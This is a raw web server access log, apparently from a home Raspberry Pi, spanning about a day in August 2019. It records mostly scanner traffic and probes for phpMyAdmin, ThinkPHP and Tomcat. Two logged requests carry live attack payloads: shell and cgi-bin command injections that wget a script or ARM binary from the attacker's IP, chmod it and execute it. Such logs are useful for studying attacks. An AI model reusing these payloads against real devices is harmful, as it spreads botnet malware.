Sat Aug 17 06:25:03 MDT 2019 06:25:03 up 8 days, 9:14, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Wed14 8days 2:04 0.35s /usr/bin/lxsession -s LXDE-pi -e LXDE 119.28.134.196 - - [17/Aug/2019:12:45:46 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:47 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:47 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:48 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:48 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:49 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 119.28.134.196 - - [17/Aug/2019:12:45:49 +0000] "UNKNOWN HTTP/0.9" 400 0 "" "" 89.248.174.219 - - [17/Aug/2019:12:48:20 +0000] "GET /shell?cd+/tmp;wget+http:/\/89.248.174.219/jaws.sh+-O+-+>word.sh;chmod+777+word.sh;sh+word.sh HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 92.118.160.57 - - [17/Aug/2019:13:28:27 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 89.165.122.55 - - [17/Aug/2019:16:09:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 190.231.57.245 - - [17/Aug/2019:16:42:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 5.236.201.135 - - [17/Aug/2019:20:39:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 77.247.110.69 - - [17/Aug/2019:20:46:56 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 77.247.110.69 - - [17/Aug/2019:20:47:00 +0000] "HEAD /robots.txt HTTP/1.0" 404 0 "" "" 41.78.75.21 - - [17/Aug/2019:22:24:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 159.203.42.143 - - [17/Aug/2019:22:24:54 +0000] "GET / HTTP/1.1" 200 25000 "162.250.19.14" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" 107.170.237.161 - - [17/Aug/2019:22:37:17 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 35.233.105.134 - - [17/Aug/2019:23:36:14 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 85.105.73.129 - - [18/Aug/2019:00:06:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 198.199.76.179 - - [18/Aug/2019:01:11:06 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 186.3.45.20 - - [18/Aug/2019:01:15:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 89.248.174.219 - - [18/Aug/2019:01:53:53 +0000] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F89.248.174.219%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 HTTP/1.1" 404 0 "" "" 61.219.11.153 - - [18/Aug/2019:01:54:53 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 112.203.125.126 - - [18/Aug/2019:02:39:43 +0000] "GET / HTTP/1.0" 200 25000 "" "" 212.69.18.232 - - [18/Aug/2019:02:48:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 94.182.48.202 - - [18/Aug/2019:04:53:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 197.232.68.220 - - [18/Aug/2019:05:02:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 159.8.30.164 - - [18/Aug/2019:05:32:40 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 159.8.30.164 - - [18/Aug/2019:05:32:48 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:48 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:49 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:49 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:49 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:49 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:50 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:50 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 159.8.30.164 - - [18/Aug/2019:05:32:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.131.19.43 - - [18/Aug/2019:05:45:10 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705" 180.131.19.43 - - [18/Aug/2019:05:45:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 180.131.19.43 - - [18/Aug/2019:05:45:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 24.201.17.16 - - [18/Aug/2019:07:04:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 24.201.17.16 - - [18/Aug/2019:07:04:30 +0000] "GET / HTTP/1.1" 200 25000 "" "" 124.109.62.68 - - [18/Aug/2019:07:19:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 188.134.6.223 - - [18/Aug/2019:07:43:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 112.3.28.71 - - [18/Aug/2019:09:24:33 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 89.248.174.219 - - [18/Aug/2019:10:03:01 +0000] "GET / HTTP/1.0" 200 25000 "" "" 130.43.43.52 - - [18/Aug/2019:11:11:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sun Aug 18 06:25:06 MDT 2019 06:25:06 up 9 days, 9:14, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Wed14 9days 10:45 0.60s /usr/bin/lxsession -s LXDE-pi -e LXDE